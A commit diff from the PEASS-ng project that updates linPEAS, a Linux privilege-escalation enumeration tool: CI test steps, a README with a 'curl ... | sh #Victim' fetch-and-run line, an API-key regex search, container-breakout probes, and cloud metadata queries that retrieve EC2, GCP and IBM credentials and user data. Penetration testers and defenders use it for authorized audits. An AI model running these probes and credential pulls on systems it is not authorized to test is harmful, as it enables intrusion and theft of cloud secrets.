Update CI-master_tests.yml

Merge branch 'master' of https://github.com/carlospolop/PEASS-ng
push
2025-12-16 05:19:01 +00:00 · 2023-04-13 16:12:10 +02:00 · 2023-04-13 16:10:37 +02:00 · 2023-04-13 16:10:26 +02:00 · 2023-04-13 15:47:15 +02:00 · 2023-04-13 15:44:57 +02:00
156 changed files with 18682 additions and 17823 deletions
--- a/.github/workflows/CI-master_tests.yml
+++ b/.github/workflows/CI-master_tests.yml
@@ -1,7 +1,7 @@
 name: CI-master_test

 on:
-  pull_request:
+  push:
    branches:
      - master
  
@@ -198,8 +198,36 @@ jobs:
        run: linPEAS/linpeas.sh -h
      
      # Run linpeas as a test
-      - name: Run linpeas
-        run: linPEAS/linpeas.sh -a -D
+      - name: Run linpeas system_information
+        run: linPEAS/linpeas.sh -o system_information -a
+      
+      - name: Run linpeas container
+        run: linPEAS/linpeas.sh -o container -a
+      
+      - name: Run linpeas cloud
+        run: linPEAS/linpeas.sh -o cloud -a
+      
+      - name: Run linpeas procs_crons_timers_srvcs_sockets
+        run: linPEAS/linpeas.sh -o procs_crons_timers_srvcs_sockets -a
+      
+      - name: Run linpeas network_information
+        run: linPEAS/linpeas.sh -o network_information -t -a
+      
+      - name: Run linpeas users_information
+        run: linPEAS/linpeas.sh -o users_information -a
+      
+      - name: Run linpeas software_information
+        run: linPEAS/linpeas.sh -o software_information -a
+      
+      - name: Run linpeas interesting_perms_files
+        run: linPEAS/linpeas.sh -o interesting_perms_files -a
+      
+      - name: Run linpeas interesting_files
+        run: linPEAS/linpeas.sh -o interesting_files -a
+      
+      # Too much time
+      #- name: Run linpeas api_keys_regex
+      #  run: linPEAS/linpeas.sh -o api_keys_regex -r
      
      # Upload files for release
      - name: Upload linpeas.sh
@@ -208,6 +236,12 @@ jobs:
          name: linpeas.sh
          path: linPEAS/linpeas.sh
      
+      - name: Upload linpeas_fat.sh
+        uses: actions/upload-artifact@v2
+        with:
+          name: linpeas_fat.sh
+          path: linPEAS/linpeas_fat.sh
+      
      ## Linux bins
      - name: Upload linpeas_linux_386
        uses: actions/upload-artifact@v2
@@ -335,6 +369,11 @@ jobs:
      with:
        name: linpeas.sh
    
+    - name: Download linpeas_fat.sh
+      uses: actions/download-artifact@v2
+      with:
+        name: linpeas_fat.sh
+
    - name: Download linpeas_linux_386
      uses: actions/download-artifact@v2
      with:
@@ -377,7 +416,7 @@ jobs:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      with:
        tag_name: ${{steps.date.outputs.date}}
-        release_name: Release ${{ github.ref }} ${{steps.date.outputs.date}}
+        release_name: Release ${{ github.ref }}2 ${{steps.date.outputs.date}}
        draft: false
        prerelease: false
        
@@ -388,4 +427,3 @@ jobs:
        assets_path: .
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
-  
--- a/build_lists/sensitive_files.yaml
+++ b/build_lists/sensitive_files.yaml
--- a/linPEAS/README.md
+++ b/linPEAS/README.md
@@ -22,7 +22,7 @@ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas

 ```bash
 # Local network
-sudo python -m SimpleHTTPServer 80 #Host
+sudo python3 -m http.server 80 #Host
 curl 10.10.10.10/linpeas.sh | sh #Victim

 # Without curl
@@ -47,12 +47,6 @@ chmod +x linpeas_linux_amd64
 ./linpeas_linux_amd64
 ```

-```bash
-# Execute from memory in Penelope session
-# From: https://github.com/brightio/penelope
-> run peass-ng
-```
-
 ## Firmware Analysis
 If you have a **firmware** and you want to **analyze it with linpeas** to **search for passwords or bad configured permissions** you have 2 main options.

@@ -107,7 +101,7 @@ By default linpeas takes around **4 mins** to complete, but It could take from *
 - **-D** (Debug) - Print information about the checks that haven't discovered anything and about the time each check took
 - **-d/-p/-i/-t** (Local Network Enumeration) - Linpeas can also discover and port-scan local networks

-This script has **several lists** included inside of it to be able to **color the results** in order to highlight PE vector.
+**It's recommended to use the params `-a` and `-r` if you are looking for a complete and intensive scan**.

 ```
 Enumerate and search Privilege Escalation vectors.
--- a/linPEAS/builder/linpeas_parts/10_api_keys_regex.sh
+++ b/linPEAS/builder/linpeas_parts/10_api_keys_regex.sh
@@ -0,0 +1,48 @@
+
+search_for_regex(){
+    title=$1
+    regex=$2
+    caseSensitive=$3
+    
+    if [ "$caseSensitive" ]; then
+        i="i"
+    else
+        i=""
+    fi
+
+    print_3title_no_nl "Searching $title..."
+
+    if [ "$SEARCH_IN_FOLDER" ]; then
+        timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+    else
+        # Search in home direcoties (usually the slowest)
+        timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+        
+        # Search in etc
+        timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+        
+        # Search in opt
+        timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+        
+        # Search in possible web folders (usually only 1 will exist)
+        timeout 120 find /var/www /usr/local/www /usr/share/nginx /Library/WebServer/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+        
+        # Search in logs
+        timeout 120 find /var/log /var/logs /Library/Logs -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+        
+        # Search in backups
+        timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+        
+        # Search in others folders (usually only /srv or /Applications will exist)
+        timeout 120 find /tmp /srv /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null  | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+    fi
+    wait
+}
+
+
+
+if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then
+    peass{REGEXES}
+else
+    echo "Regexes to search for API keys aren't activated, use param '-r' "
+fi
--- a/linPEAS/builder/linpeas_parts/1_system_information.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information.sh
@@ -21,42 +21,6 @@ else echo_not_found "sudo"
 fi
 echo ""

-#-- SY) CVEs
-print_2title "CVEs Check"
-
-#-- SY) CVE-2021-4034
-if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1642035600" ]; then 
-    echo "Vulnerable to CVE-2021-4034" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-    echo ""
-fi
-
-#-- SY) CVE-2021-3560
-polkitVersion=$(systemctl status polkit.service 2>/dev/null | grep version | cut -d " " -f 9)
-if [ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 ] || [ "$(yum list installed 2>/dev/null | grep polkit | grep -c 0.117-2)" -ge 1 ]; then
-    echo "Vulnerable to CVE-2021-3560" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-    echo ""
-fi
-
-#-- SY) CVE-2022-0847
-#-- https://dirtypipe.cm4all.com/
-#-- https://stackoverflow.com/a/37939589
-kernelversion=$(uname -r | awk -F"-" '{print $1}')
-kernelnumber=$(echo $kernelversion | awk -F. '{ printf("%d%03d%03d%03d\n", $1,$2,$3,$4); }')
-if [ $kernelnumber -ge 5008000000 ] && [ $kernelnumber -lt 5017000000 ]; then # if kernel version between 5.8 and 5.17
-    echo "Potentially Vulnerable to CVE-2022-0847" | sed -${E} "s,.*,${SED_RED},"
-    echo ""
-fi
-
-#-- SY) CVE-2022-2588
-#-- https://github.com/Markakd/CVE-2022-2588
-kernelversion=$(uname -r | awk -F"-" '{print $1}')
-kernelnumber=$(echo $kernelversion | awk -F. '{ printf("%d%03d%03d%03d\n", $1,$2,$3,$4); }')
-if [ $kernelnumber -ge 3017000000 ] && [ $kernelnumber -lt 5019000000 ]; then # if kernel version between 3.17 and 5.19
-    echo "Potentially Vulnerable to CVE-2022-2588" | sed -${E} "s,.*,${SED_RED},"
-    echo ""
-fi
-echo ""
-
 #--SY) USBCreator
 if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then
    print_2title "USBCreator"
@@ -83,9 +47,10 @@ print_2title "PATH"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses"
 if ! [ "$IAMROOT" ]; then
    echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g"
-    echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g"
-else
-    echo "New path exported: $PATH" 2>/dev/null
+fi
+
+if [ "$DEBUG" ]; then
+     echo "New path exported: $PATH"
 fi
 echo ""

@@ -196,6 +161,10 @@ else
    echo_not_found "AppArmor"
 fi

+#-- SY) LinuxONE
+print_list "is linuxONE? ................... "$NC
+( (uname -a | grep "s390x" >/dev/null 2>&1) && echo "Yes" || echo_not_found "s390x")
+
 #-- SY) grsecurity
 print_list "grsecurity present? ............ "$NC
 ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity")
@@ -214,11 +183,11 @@ print_list "SELinux enabled? ............... "$NC

 #-- SY) Seccomp
 print_list "Seccomp enabled? ............... "$NC
-([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
+([ "$(grep Seccomp /proc/self/status 2>/dev/null | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"

 #-- SY) AppArmor
 print_list "AppArmor profile? .............. "$NC
-(cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
+(cat /proc/self/attr/current 2>/dev/null || echo "unconfined") | sed "s,unconfined,${SED_RED}," | sed "s,kernel,${SED_GREEN},"

 #-- SY) AppArmor
 print_list "User namespace? ................ "$NC
@@ -226,7 +195,7 @@ if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,ena

 #-- SY) cgroup2
 print_list "Cgroup2 enabled? ............... "$NC
-([ "$(grep cgroup2 /proc/filesystems)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
+([ "$(grep cgroup2 /proc/filesystems 2>/dev/null)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"

 #-- SY) Gatekeeper
 if [ "$MACPEAS" ]; then
--- a/linPEAS/builder/linpeas_parts/2_container.sh
+++ b/linPEAS/builder/linpeas_parts/2_container.sh
@@ -137,16 +137,58 @@ checkContainerExploits() {
  fi
 }

-checkProcSysBreakouts(){
-  if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then release_agent_breakout1="Yes"; else release_agent_breakout1="No"; fi
+checkCreateReleaseAgent(){
+  cat /proc/$$/cgroup 2>/dev/null | grep -Eo '[0-9]+:[^:]+' | grep -Eo '[^:]+$' | while read -r subsys
+  do
+      if unshare -UrmC --propagation=unchanged bash -c "mount -t cgroup -o $subsys cgroup /tmp/cgroup_3628d4 2>&1 >/dev/null && test -w /tmp/cgroup_3628d4/release_agent" >/dev/null 2>&1 ; then
+          release_agent_breakout2="Yes (unshare with $subsys)";
+          rm -rf /tmp/cgroup_3628d4
+          break
+      fi
+  done
+}

+checkProcSysBreakouts(){
+  dev_mounted="No"
+  if [ $(ls -l /dev | grep -E "^c" | wc -l) -gt 50 ]; then
+    dev_mounted="Yes";
+  fi
+
+  proc_mounted="No"
+  if [ $(ls /proc | grep -E "^[0-9]" | wc -l) -gt 50 ]; then
+    proc_mounted="Yes";
+  fi
+
+  run_unshare=$(unshare -UrmC bash -c 'echo -n Yes' 2>/dev/null)
+  if ! [ "$run_unshare" = "Yes" ]; then
+    run_unshare="No"
+  fi
+
+  if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then 
+    release_agent_breakout1="Yes"
+  else 
+    release_agent_breakout1="No"
+  fi
+  
+  release_agent_breakout2="No"
  mkdir /tmp/cgroup_3628d4
  mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4 2>/dev/null
-  if [ $? -eq 0 ]; then release_agent_breakout2="Yes"; else release_agent_breakout2="No"; fi
+  if [ $? -eq 0 ]; then 
+    release_agent_breakout2="Yes"; 
+    rm -rf /tmp/cgroup_3628d4
+  else 
+    mount -t cgroup -o rdma cgroup /tmp/cgroup_3628d4 2>/dev/null
+    if [ $? -eq 0 ]; then 
+      release_agent_breakout2="Yes"; 
+      rm -rf /tmp/cgroup_3628d4
+    else 
+      checkCreateReleaseAgent
+    fi
+  fi
  rm -rf /tmp/cgroup_3628d4 2>/dev/null
  
  core_pattern_breakout="$( (echo -n '' > /proc/sys/kernel/core_pattern && echo Yes) 2>/dev/null || echo No)"
-  modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` || echo No)"
+  modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` 2>/dev/null || echo No)"
  panic_on_oom_dos="$( (echo -n '' > /proc/sys/vm/panic_on_oom && echo Yes) 2>/dev/null || echo No)"
  panic_sys_fs_dos="$( (echo -n '' > /proc/sys/fs/suid_dumpable && echo Yes) 2>/dev/null || echo No)"
  binfmt_misc_breakout="$( (echo -n '' > /proc/sys/fs/binfmt_misc/register && echo Yes) 2>/dev/null || echo No)"
@@ -258,8 +300,8 @@ if [ "$inContainer" ]; then
    echo ""
    print_2title "Container & breakout enumeration"
    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout"
-    print_list "Container ID ...................$NC $(cat /etc/hostname && echo '')"
-    if echo "$containerType" | grep -qi "docker"; then
+    print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')"
+    if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then
        print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n"
    fi
    print_list "Seccomp enabled? ............... "$NC
@@ -269,7 +311,7 @@ if [ "$inContainer" ]; then
    (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN},"

    print_list "User proc namespace? ........... "$NC
-    if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
+    if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then (printf "enabled"; cat /proc/self/uid_map) | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi

    checkContainerExploits
    print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
@@ -278,33 +320,36 @@ if [ "$inContainer" ]; then
    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts"
    
    checkProcSysBreakouts
-    print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "/proc mounted? ................. $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "/dev mounted? .................. $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "Run ushare ..................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
-    print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
-    print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
-    print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
-    print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-    print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-    print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-    print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,/Yes,${SED_RED},"
-    print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
+    print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED},"
    if [ "$EXTRA_CHECKS" ]; then
-      print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/sys/kernel/vmcoreinfo readable  $vmcoreinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/sys/firmware/efi/vars writable  $efi_vars_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
-      print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
+      print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/sys/kernel/vmcoreinfo readable  $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/sys/firmware/efi/vars writable  $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
    fi
    
    echo ""
@@ -344,7 +389,9 @@ if [ "$inContainer" ]; then
    if [ "$(command -v capsh)" ]; then 
      capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
    else
-      cat /proc/self/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
+      defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap"
+      cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
+      echo $ITALIC"Run capsh --decode=<hex> to decode the capabilities"$NC
    fi
    echo ""

--- a/linPEAS/builder/linpeas_parts/3_cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud.sh
@@ -7,7 +7,10 @@ GCP_BAD_SCOPES="/cloud-platform|/compute"

 exec_with_jq(){
  if [ "$(command -v jq)" ]; then 
-    $@ | jq;
+    $@ | jq 2>/dev/null;
+    if ! [ $? -eq 0 ]; then
+      $@;
+    fi
   else 
    $@;
   fi
@@ -20,6 +23,24 @@ check_gcp(){
  fi
 }

+check_do(){
+  is_do="No"
+  if [ -f "/etc/cloud/cloud.cfg.d/90-digitalocean.cfg" ]; then
+    is_do="Yes"
+  fi
+}
+
+check_ibm_vm(){
+  is_ibm_vm="No"
+  if grep -q "nameserver 161.26.0.10" "/etc/resolv.conf" && grep -q "nameserver 161.26.0.11" "/etc/resolv.conf"; then
+    curl --connect-timeout 2  "http://169.254.169.254" > /dev/null 2>&1 || wget --timeout 2 --tries 1  "http://169.254.169.254" > /dev/null 2>&1
+    if [ "$?" -eq 0 ]; then
+      IBM_TOKEN=$( ( curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" -H "Metadata-Flavor: ibm" -H "Accept: application/json" 2> /dev/null | cut -d '"' -f4 ) || ( wget --tries 1 -O - --method PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" --header "Metadata-Flavor: ibm" --header "Accept: application/json" 2>/dev/null | cut -d '"' -f4 ) )
+      is_ibm_vm="Yes"
+    fi
+  fi
+}
+
 check_aws_ecs(){
  is_aws_ecs="No"
  if (env | grep -q ECS_CONTAINER_METADATA_URI_v4); then
@@ -34,11 +55,6 @@ check_aws_ecs(){
  
  elif (env | grep -q AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); then
    is_aws_ecs="Yes";
-    
-  
-  elif (curl --connect-timeout 2 "http://169.254.170.2/v2/credentials/" >/dev/null 2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1 "http://169.254.170.2/v2/credentials/" >/dev/null 2>&1 && [ "$?" -eq "0" ]); then
-    is_aws_ecs="Yes";
-
  fi
  
  if [ "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ]; then
@@ -48,6 +64,7 @@ check_aws_ecs(){

 check_aws_ec2(){
  is_aws_ec2="No"
+  is_aws_ec2_beanstalk="No"

  if [ -d "/var/log/amazon/" ]; then
    is_aws_ec2="Yes"
@@ -59,6 +76,10 @@ check_aws_ec2(){
      is_aws_ec2="Yes"
    fi
  fi
+  
+  if [ "$is_aws_ec2" = "Yes" ] && grep -iq "Beanstalk" "/etc/motd"; then
+    is_aws_ec2_beanstalk="Yes"
+  fi
 }

 check_aws_lambda(){
@@ -76,8 +97,13 @@ check_aws_ecs
 print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 check_aws_ec2
 print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
 check_aws_lambda
 print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+check_do
+print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+check_ibm_vm
+print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"

 echo ""

@@ -158,6 +184,11 @@ if [ "$is_gcp" = "Yes" ]; then
            echo "  ==============  "
        done
        
+        echo ""
+        print_3title "User Data"
+        echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script")
+        echo ""
+
        echo ""
        print_3title "Service Accounts"
        for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do 
@@ -259,7 +290,14 @@ if [ "$is_aws_ec2" = "Yes" ]; then
        
        echo ""
        print_3title "User Data"
-        eval $aws_req "http://169.254.169.254/latest/user-data"
+        eval $aws_req "http://169.254.169.254/latest/user-data"; echo ""
+        
+        echo ""
+        echo "EC2 Security Credentials"
+        exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
+        
+        print_3title "SSM Runnig"
+        ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED},"
    fi
 fi

@@ -275,3 +313,65 @@ if [ "$is_aws_lambda" = "Yes" ]; then
  printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
 fi

+if [ "$is_do" = "Yes" ]; then
+  print_2title "DO Droplet Enumeration"
+
+  do_req=""
+  if [ "$(command -v curl)" ]; then
+      do_req='curl -s -f '
+  elif [ "$(command -v wget)" ]; then
+      do_req='wget -q -O - '
+  else 
+      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+  fi
+
+  if [ "$do_req" ]; then
+    URL="http://169.254.169.254/metadata"
+    printf "Id: "; eval $do_req "$URL/v1/id"; echo ""
+    printf "Region: "; eval $do_req "$URL/v1/region"; echo ""
+    printf "Public keys: "; eval $do_req "$URL/v1/public-keys"; echo ""
+    printf "User data: "; eval $do_req "$URL/v1/user-data"; echo ""
+    printf "Dns: "; eval $do_req "$URL/v1/dns/nameservers" | tr '\n' ','; echo ""
+    printf "Interfaces: "; eval $do_req "$URL/v1.json" | jq ".interfaces";
+    printf "Floating_ip: "; eval $do_req "$URL/v1.json" | jq ".floating_ip";
+    printf "Reserved_ip: "; eval $do_req "$URL/v1.json" | jq ".reserved_ip";
+    printf "Tags: "; eval $do_req "$URL/v1.json" | jq ".tags";
+    printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features";
+  fi
+fi
+
+if [ "$is_ibm_vm" = "Yes" ]; then
+  print_2title "IBM Cloud Enumeration"
+
+  if ! [ "$IBM_TOKEN" ]; then
+    echo "Couldn't get the metdata token:("
+
+  else
+    TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN"
+    ACCEPT_HEADER="Accept: application/json"
+    URL="http://169.254.169.254/latest/meta-data"
+    
+    ibm_req=""
+    if [ "$(command -v curl)" ]; then
+        ibm_req="curl -s -f -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
+    elif [ "$(command -v wget)" ]; then
+        ibm_req="wget -q -O - -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
+    else 
+        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+    fi
+
+    print_3title "Instance Details"
+    exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01"
+
+    print_3title "Keys and User data"
+    exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01"
+    exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01"
+
+    print_3title "Placement Groups"
+    exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01"
+
+    print_3title "IAM credentials"
+    exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01"
+  fi
+
+fi
